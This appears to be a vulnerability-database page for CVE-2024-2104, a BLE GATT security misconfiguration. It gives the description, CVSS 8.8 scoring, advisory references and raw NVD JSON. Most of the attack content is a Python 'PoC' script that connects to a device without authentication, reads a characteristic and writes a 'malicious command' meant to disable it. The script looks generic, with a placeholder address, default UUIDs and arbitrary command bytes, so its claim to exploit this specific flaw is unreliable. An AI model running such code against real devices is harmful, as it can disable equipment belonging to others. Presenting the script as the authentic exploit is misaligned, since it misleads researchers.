Security Vulnerability Report
CVE-2024-2104 CVSS 8.8 HIGH

CVE-2024-2104

Published: 2025-12-10 13:16:02
Last Modified: 2026-04-15 00:35:42

Description

Due to improper BLE security configurations on the device's GATT server, an adjacent unauthenticated attacker can read and write device control commands through the mobile app service, which could render the device unusable.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Device firmware that exposes a BLE GATT service with an improper security configuration (see the official VDE-CERT advisory for the specific affected versions).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2024-2104 PoC - BLE GATT Security Misconfiguration
# Author: Security Researcher
# Description: Exploit for improper BLE GATT security configuration

import asyncio

from bleak import BleakClient
from bleak.exc import BleakError

TARGET_DEVICE = "XX:XX:XX:XX:XX:XX"  # Target BLE device MAC address
GATT_SERVICE_UUID = "0000fff0-0000-1000-8000-00805f9b34fb"
GATT_CHAR_WRITE_UUID = "0000fff1-0000-1000-8000-00805f9b34fb"
GATT_CHAR_READ_UUID = "0000fff2-0000-1000-8000-00805f9b34fb"


async def exploit_ble_gatt():
    """
    Exploit improper BLE GATT security configuration
    This PoC demonstrates unauthorized read/write access to device controls
    """
    try:
        print(f"[*] Connecting to target device: {TARGET_DEVICE}")
        # Connect without authentication (exploiting misconfiguration)
        client = BleakClient(TARGET_DEVICE, timeout=10.0)
        await client.connect()

        if not client.is_connected:
            print("[-] Failed to connect to device")
            return

        print("[+] Successfully connected without authentication!")
        print("[*] Exploiting improper BLE security configuration...")

        # Step 1: Enumerate services and characteristics
        print("\n[*] Enumerating GATT services...")
        for service in client.services:
            print(f"  Service: {service.uuid} - {service.description}")
            for char in service.characteristics:
                print(f"    Characteristic: {char.uuid} - {char.properties}")

        # Step 2: Read sensitive data from GATT characteristics
        print("\n[*] Reading device information...")
        try:
            data = await client.read_gatt_char(GATT_CHAR_READ_UUID)
            print(f"[+] Read data: {data.hex()}")
        except BleakError as e:
            print(f"[-] Read failed: {e}")

        # Step 3: Write control commands to device
        print("\n[*] Sending control commands...")
        # Example malicious command to disable device functionality
        malicious_command = bytes([0x01, 0x00, 0xFF, 0xFF, 0x00])
        try:
            await client.write_gatt_char(GATT_CHAR_WRITE_UUID, malicious_command)
            print("[+] Malicious command sent successfully!")
            print("[*] Device may now be disabled or under attacker control")
        except BleakError as e:
            print(f"[-] Write failed: {e}")

        # Cleanup
        await client.disconnect()
        print("\n[*] Exploitation complete")

    except BleakError as e:
        print(f"[-] BLE Error: {e}")
    except Exception as e:
        print(f"[-] Unexpected error: {e}")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2024-2104 BLE GATT Security Misconfiguration PoC")
    print("=" * 60)
    asyncio.run(exploit_ble_gatt())
```

References

https://certvde.com/en/advisories/VDE-2024-076
https://harman.csaf-tp.certvde.com/.well-known/csaf/white/2025/hbsa-2025-0001.json

Raw JSON Data

```json
{"cve": {"id": "CVE-2024-2104", "sourceIdentifier": "[email protected]", "published": "2025-12-10T13:16:01.987", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to improper BLE security configurations on the device's GATT server, an adjacent unauthenticated attacker can read and write device control commands through the mobile app service wich could render the device unusable."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://certvde.com/en/advisories/VDE-2024-076", "source": "[email protected]"}, {"url": "https://harman.csaf-tp.certvde.com/.well-known/csaf/white/2025/hbsa-2025-0001.json", "source": "[email protected]"}]}}
```